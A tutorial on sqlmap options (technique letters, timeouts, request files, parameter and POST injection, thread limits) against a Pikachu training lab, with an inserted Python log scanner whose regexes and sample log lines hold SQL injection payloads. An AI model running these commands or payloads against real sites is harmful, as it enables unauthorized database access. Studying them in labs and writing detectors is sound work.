Sqlmap tutorial (III) practical skills II
2022-07-06 05:58:00 【A τθ】
1. --technique: use a specified injection technique
In some engagements you will inevitably run into slow network responses, and the IDC (hosting data center) may also be able to detect sqlmap. A professional penetration tester has to be fast, accurate and decisive.
Some SQL injection points only allow time-based injection. In that case, set sqlmap's injection technique to T.
The values of the --technique parameter are:
B: Boolean-based blind SQL injection (Boolean injection)
E: Error-based SQL injection (error-reporting injection)
U: UNION query SQL injection (union query injection)
S: Stacked queries SQL injection (multi-statement query injection)
T: Time-based blind SQL injection (time-delay injection)
Q: Inline SQL injection (inline injection)
2. Use time-based delay injection
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T
Several techniques can be specified together for detection; the default is all of them:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT
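A defender's view of the technique letters above, as an added example that is not part of the original tutorial or of sqlmap: a Python scan of web access logs that labels each request with the --technique class its parameters resemble. The regex signatures and the sample log lines are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic signatures per --technique letter. These patterns are assumptions
# chosen for illustration, not sqlmap's own payload list.
SIGNATURES = {
    "B": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(?:extractvalue|updatexml)\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "U": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "S": re.compile(r";\s*(?:select|insert|update|delete|drop)\b", re.I),
    "T": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}

# Common Log Format request field: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the technique letters whose signature matches any query value."""
    hits = set()
    # parse_qsl URL-decodes values, so %20 and + become spaces before matching
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(k for k, rx in SIGNATURES.items() if rx.search(value))
    return "".join(sorted(hits))

def scan(log_lines):
    """Yield (line_number, letters) for every log line with a match."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m:
            letters = classify(m.group(1))
            if letters:
                yield n, letters

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '10.0.0.7 - - [06/Jul/2022:05:58:00 +0000] "GET /06/vul/sqli/sqli_str.php?name=1&submit=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Jul/2022:05:58:01 +0000] "GET /06/vul/sqli/sqli_str.php?name=1%27%20AND%20SLEEP(5)--%20&submit=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Jul/2022:05:58:02 +0000] "GET /06/vul/sqli/sqli_str.php?name=1%27+UNION+ALL+SELECT+NULL--+&submit=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Jul/2022:05:58:03 +0000] "GET /06/vul/sqli/sqli_str.php?name=1%27+AND+1%3D1--+&submit=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, letters in scan(SAMPLE):
        print(f"line {n}: matches technique(s) {letters}")
```

Signatures like these only catch textbook payload forms, so a hit is a lead to correlate with request rate and response timing rather than a verdict.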


3. Set the timeout
--timeout sets the request timeout. Some web pages are slow to respond, and this parameter lets you increase the access timeout. The default is 30 seconds.
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10
4. Read a request from a text file for SQL injection detection
sqlmap -r post.txt



5. Specify the parameter to inject
-p specifies the parameter to be tested:
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1
Use * to mark the injection point
If the URL is pseudo-static, use an asterisk (*) to mark the place to test:
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html"
POST injection:
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1
6. Change the default maximum number of threads
The setting is in sqlmap/lib/core/settings.py.
The default maximum number of threads is 10; you can set the maximum to 100:
MAX_NUMBER_OF_THREADS = 100
